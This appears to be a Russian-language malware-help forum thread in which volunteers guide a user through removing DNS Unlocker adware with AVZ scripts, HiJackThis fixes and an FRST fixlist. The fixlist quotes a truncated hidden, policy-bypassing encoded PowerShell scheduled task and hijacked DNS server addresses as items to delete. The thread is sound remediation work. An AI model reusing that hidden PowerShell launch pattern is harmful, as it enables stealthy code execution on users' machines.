Перейти к содержанию

DNS Unlocker


Рекомендуемые сообщения

Приветствую всех!

Давно подцепил эту простуду - DNS Unlocker. Теперь вот не знаю как избавится. 

Из антивирусов, стояли бесплатные аваст и нод. Частично блокировали Unlocker.

Нынче поставил себе с подпиской kaspersky internet security.

После удаления аваста и нода - Unlocker взялся за моего старичка по полной, в виде : всплывающих окон, перенаправления страниц и баннеров..

В программах и компонентах я его удалил,в браузерах и их расширениях тоже... не знаю где этот паразит находится, но помогите избавиться от него пожалуйста...

 

 

12972055_m.jpg

AdditionFRST.rar

CollectionLog-2016.06.09-22.03.zip

Ссылка на комментарий
Поделиться на другие сайты

Выполните скрипт в AVZ

begin
ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.' + #13#10 + 'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
   SearchRootkit(true, true);
   SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Program Files (x86)\OLBPre\OLBPre.exe','');
 QuarantineFile('C:\Users\Ivan\AppData\Roaming\DealPly\UPDATE~1\UPDATE~1.EXE','');
 QuarantineFile('C:\Users\Ivan\AppData\Roaming\newSI_23\s_inst.exe','');
 DeleteFile('C:\Users\Ivan\AppData\Roaming\newSI_23\s_inst.exe','32');
 DeleteFile('C:\Users\Ivan\AppData\Roaming\DealPly\UPDATE~1\UPDATE~1.EXE','32');
 DeleteFile('C:\Program Files (x86)\OLBPre\OLBPre.exe','32');
 DeleteFile('C:\Users\Ivan\AppData\Local\Amigo\Application\amigo.exe','32');
 DeleteFile('C:\Windows\system32\Tasks\newSI_23','64');
 DeleteFile('C:\Windows\system32\Tasks\LaunchPreSignup','64');
 DeleteFile('C:\Windows\system32\Tasks\DealPly','64');
 DeleteFile('C:\Windows\Tasks\newSI_23.job','32');
BC_ImportAll;
ExecuteSysClean;
BC_Activate;
RebootWindows(false);
end.
Будет выполнена перезагрузка компьютера.

 

Выполните скрипт в AVZ

begin
CreateQurantineArchive('c:\quarantine.zip');
end.
c:\quarantine.zip отправьте по адресу newvirus@kaspersky.com

Полученный ответ сообщите здесь (с указанием номера KLAN)

 

Пофиксите в HiJack

O2 - BHO: Спутник@Mail.Ru - {8984B388-A5BB-4DF7-B274-77B879E179DB} - (no file)
O2 - BHO: Money Viking - {a8007792-8f54-4b9c-bb73-04187702a6ae} - (no file)
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~1\Office15\URLREDIR.DLL
O2 - BHO: TmBpIeBHO - {BBACBAFD-FA5E-4079-8B33-00EB9F13D4AC} - C:\Program Files\Trend Micro\AMSP\Module\20002\6.5.1234\6.5.1234\TmBpIe32.dll (file missing)
O2 - BHO: (no name) - {D5FEC983-01DB-414a-9456-AF95AC9ED7B5} - (no file)
O2 - BHO: DVDVideoSoft.WebPageAdjuster - {EE932B49-D5C0-4D19-A3DA-CE0849258DE6} - (no file)
O17 - HKLM\System\CCS\Services\Tcpip\..\{6EA3A230-F579-469F-B3D1-E882C35D27FF}: NameServer = 82.163.143.171 82.163.142.173,82.209.240.241,82.209.243.241
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: NameServer = 82.163.143.171 82.163.142.173
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 82.163.143.171 82.163.142.173
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 82.163.143.171 82.163.142.173
Выполните ЕЩЕ РАЗ правила и предоставьте НОВЫЕ логи
  • Спасибо (+1) 1
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты

Спасибо за рекомендацию земляк.

Вот ответ и лог..

 

[KLAN-4417888326]

Здравствуйте,

Это сообщение сформировано автоматической системой приёма писем. Сообщение содержит информацию о том, какие вердикты на файлы (если таковые есть в письме) выносит Антивирус с последними обновлениями. 
quarantine.zip
Вредоносный код в файле не обнаружен.
С уважением, Лаборатория Касперского
"125212, Россия, Москва, Ленинградское шоссе, д.39А, стр.3 Тел./факс: + 7 (495) 797 8700 http://www.kaspersky.ru http://www.viruslist.ru"

CollectionLog-2016.06.10-02.03.zip

Ссылка на комментарий
Поделиться на другие сайты

Скачайте Farbar Recovery Scan Tool NAAC5Ba.png и сохраните на Рабочем столе.

  • Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

2. Убедитесь, что в окне Optional Scan отмечены List BCD, Driver MD5 и 90 Days Files.

3munStB.png

3. Нажмите кнопку Scan.

4. После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите этот отчет в следующем сообщении.

5. Если программа была запущена в первый раз, также будет создан отчет (Addition.txt). Пожалуйста, и его тоже прикрепите в следующем сообщении.

6. Логи, полученные в пп. 4 и 5, заархивируйте (в один архив) и прикрепите к сообщению.

  • Спасибо (+1) 1
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты

1. Откройте Блокнот и скопируйте в него приведенный ниже текст

CreateRestorePoint:
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  No File
2016-05-05 07:16 - 2016-05-05 07:16 - 00000000 ____D C:\ProgramData\b1bfec7b-6927-0
2016-05-05 07:16 - 2016-05-05 07:16 - 00000000 ____D C:\ProgramData\b1bfec7b-65e3-1
2016-05-05 01:16 - 2016-05-05 01:16 - 00000000 ____D C:\ProgramData\b1bfec7b-6b17-0
2016-05-05 01:16 - 2016-05-05 01:16 - 00000000 ____D C:\ProgramData\b1bfec7b-04b5-1
2016-05-04 07:16 - 2016-05-04 07:16 - 00000000 ____D C:\ProgramData\b1bfec7b-50a7-0
2016-05-04 07:16 - 2016-05-04 07:16 - 00000000 ____D C:\ProgramData\b1bfec7b-1663-1
2016-05-04 01:16 - 2016-05-04 01:16 - 00000000 ____D C:\ProgramData\b1bfec7b-7aa1-1
2016-05-04 01:16 - 2016-05-04 01:16 - 00000000 ____D C:\ProgramData\b1bfec7b-3967-0
2016-05-04 01:11 - 2016-05-04 01:12 - 00000000 ____D C:\ProgramData\b1bfec7b-7b03-0
2016-03-30 12:39 - 2016-05-04 01:11 - 00000000 ____D C:\ProgramData\b1bfec7b-2a97-1
2016-03-30 12:39 - 2016-05-04 01:11 - 00000000 ____D C:\ProgramData\b1bfec7b-0be1-0
2016-03-30 00:38 - 2016-03-30 00:38 - 00000000 ____D C:\ProgramData\b1bfec7b-6e41-0
2016-03-30 00:38 - 2016-03-30 00:38 - 00000000 ____D C:\ProgramData\b1bfec7b-3801-1
2016-03-29 12:38 - 2016-03-29 12:38 - 00000000 ____D C:\ProgramData\b1bfec7b-3217-1
2016-03-29 12:38 - 2016-03-29 12:38 - 00000000 ____D C:\ProgramData\b1bfec7b-1115-0
2016-03-29 08:38 - 2016-03-29 08:38 - 00000000 _____ C:\Windows\SysWOW64\sho3743.tmp
2016-03-29 06:38 - 2016-03-29 06:38 - 00000000 ____D C:\ProgramData\b1bfec7b-6cc3-1
2016-03-29 06:38 - 2016-03-29 06:38 - 00000000 ____D C:\ProgramData\b1bfec7b-1ae3-0
2016-03-29 00:38 - 2016-03-29 00:38 - 00000000 ____D C:\ProgramData\b1bfec7b-42c7-1
2016-03-29 00:38 - 2016-03-29 00:38 - 00000000 ____D C:\ProgramData\b1bfec7b-2487-0
2016-03-28 23:05 - 2016-03-28 23:05 - 00022704 _____ C:\Windows\system32\Drivers\EsgScanner.sys
2016-03-17 00:38 - 2016-03-28 06:20 - 00000000 ____D C:\ProgramData\b1bfec7b-3305-0
2016-03-17 00:33 - 2016-05-06 13:18 - 00000000 ____D C:\ProgramData\6a466f10
2016-03-17 00:33 - 2016-03-28 06:20 - 00000000 ____D C:\ProgramData\b1bfec7b-5865-0
2016-03-17 00:33 - 2016-03-17 00:33 - 00000000 ____D C:\ProgramData\{283d0e1a-712c-1}
2016-03-17 00:33 - 2016-03-17 00:33 - 00000000 ____D C:\ProgramData\{06282b83-112c-0}
C:\Users\Ivan\AppData\Local\Temp\bzd2ujnw.dll
C:\Users\Ivan\AppData\Local\Temp\n06pGePSnyd1.exe
Task: {F1ED6273-829D-4182-91E8-54C272CF9226} - System32\Tasks\{7A0C0847-0E7F-0E05-0911-0A0C0A09110B} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcA (the data entry has 9440 more characters). <==== ATTENTION
HKLM\...\regfile\shell\open\command: "regedit.exe" "%1" <===== ATTENTION
Reboot:
2. Нажмите ФайлСохранить как

3. Выберите папку, откуда была запущена утилита Farbar Recovery Scan Tool

4. Укажите Тип файлаВсе файлы (*.*)

5. Введите имя файла fixlist.txt и нажмите кнопку Сохранить

6. Запустите FRST, нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание, что будет выполнена перезагрузка компьютера.
  • Спасибо (+1) 1
  • Согласен 1
Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
  • Похожий контент

    • ViM
      От ViM
      Нашел много постов с аналогичной проблемой, прощу помощи 
      Готов предоставить все нужные логи 

      https://forum.kasperskyclub.ru/topic/338960-resheno-dns-servera-vystavljajutsja-sami-127022-iz-za-jetogo-kak-ja-podozrevaju-ne-rabotajut-nekotorye-igry-i-ploho-rabotajut-nekotorye-sajty/
    • ska79
      От ska79
      Правильно ли я понимаю что автоматическое получение dns возможно только если ip адрес тоже выставлен назначатться автоматически?

    • ska79
      От ska79
      Хочу попробовать сделать на базе старого смартфона свой dns сервер (в локальной сети) как это организовать? В сети ничего не нашёл 
    • KL FC Bot
      От KL FC Bot
      Группа исследователей из нескольких немецких университетов и институтов обнаружила уязвимость в DNSSEC — наборе расширений протокола DNS, которые предназначены для повышения его безопасности, в первую очередь для противодействия DNS-спуфингу.
      Атака, эксплуатирующая эту уязвимость, которую они назвали KeyTrap, позволяет вывести из строя DNS-сервер, отправив ему единственный вредоносный пакет данных. Рассказываем подробнее об этой атаке.
      Как работает атака KeyTrap и чем она опасна
      Публично об уязвимости в DNSSEC стало известно только сейчас, однако она была обнаружена еще в декабре 2023 года и зарегистрирована как CVE-2023-50387. Ей присвоена оценка 7,5 по шкале CVSS 3.1 и уровень опасности «высокий». Полностью информация об уязвимости и соответствующей атаке пока не обнародована.
      Суть KeyTrap состоит в следующем. Атакующий создает собственный DNS-сервер, отвечающий на запросы кэширующих DNS-серверов (то есть серверов, которые непосредственно обслуживают запросы клиентов) вредоносным пакетом. Далее злоумышленник заставляет кэширующий сервер запросить DNS-запись у вредоносного DNS-сервера, который в ответ отправляет криптографически подписанную вредоносную DNS-запись. При этом подпись выполнена таким образом, что в процессе ее проверки атакуемый DNS-сервер зависает на продолжительное время с загрузкой процессора 100%.
      По словам исследователей, в зависимости от используемого на DNS-сервере ПО, эта атака может с помощью единственного вредоносного пакета заставить сервер зависнуть на срок от 170 секунд до 16 часов. В результате атаки KeyTrap можно не только лишить доступа к веб-контенту всех клиентов, которые пользуются выведенным из строя DNS-сервером, но и помешать работе различных инфраструктурных сервисов, таких как защита от спама, обработка цифровых сертификатов (PKI) и безопасная междоменная маршрутизация (RPKI).
      Сами исследователи называют KeyTrap «самой серьезной из когда-либо обнаруженных атак на DNS-серверы». Интересно, что изъяны в логике проверки подписи, которые делают эту атаку возможной, обнаружены еще в одной из самых ранних версий спецификации DNSSEC, опубликованной в 1999 году. То есть данной уязвимости без малого четверть века.
      Предпосылки для KeyTrap содержатся еще в RFC-2035 — спецификации DNSSEC, опубликованной в 1999 году
       
      Посмотреть статью полностью
    • Teplovchik
      От Teplovchik
      Проблема появилась после установки "народного" фотошопа.
      В настройках сетевого адаптера автоматически начали прописываться адреса DNS 8.8.8.8,8.8.4.4 из за чего пропадает интернет на компьютере.
      Поскольку компьютер подключен к роутеру со статическим ip все остальные устройства подключенные к роутеру продолжают работать в обычном режиме. Помогает изменение  настроек адаптера на компьютере на первоначальные путем установки значения на "Получить адрес DNS-сервера автоматически" в настройках адаптера во вкладке TCP/IPv4.
      Проверка Касперским на вирусы результатов не дала. Через Process Monitor был выявлен процесс который меняет запись в реестре на установку DNS NameServer REG_SZ 8.8.8.8,8.8.4.4 это файл wmiprvse.exe
      Приложение 1,3 - скрин с указанием процесса который внёс изменение в реестр.
      Приложение 2 -скрин реестра где появляется запись с адресом DNS.
      Фотошоп был удалён но проблема осталась. Обнуление значение в строчке реестра NameServer возвращают интернет, но через некоторое время (всегда по разному может через десять минут, может через несколько часов) запись опять появляется.
      Помогите решить проблему. По найденной информации wmiprvse.exe является системным файлом и удалить его просто нельзя.
      До этого поста размещал вопрос на офф. сайте касперского. https://forum.kaspersky.com/topic/произвольная-смена-адресов-dns-процессом-wmiprvseexe-38450/#comment-155188 От туда отправили сюда. 



      CollectionLog-2024.01.12-18.37.zip
×
×
  • Создать...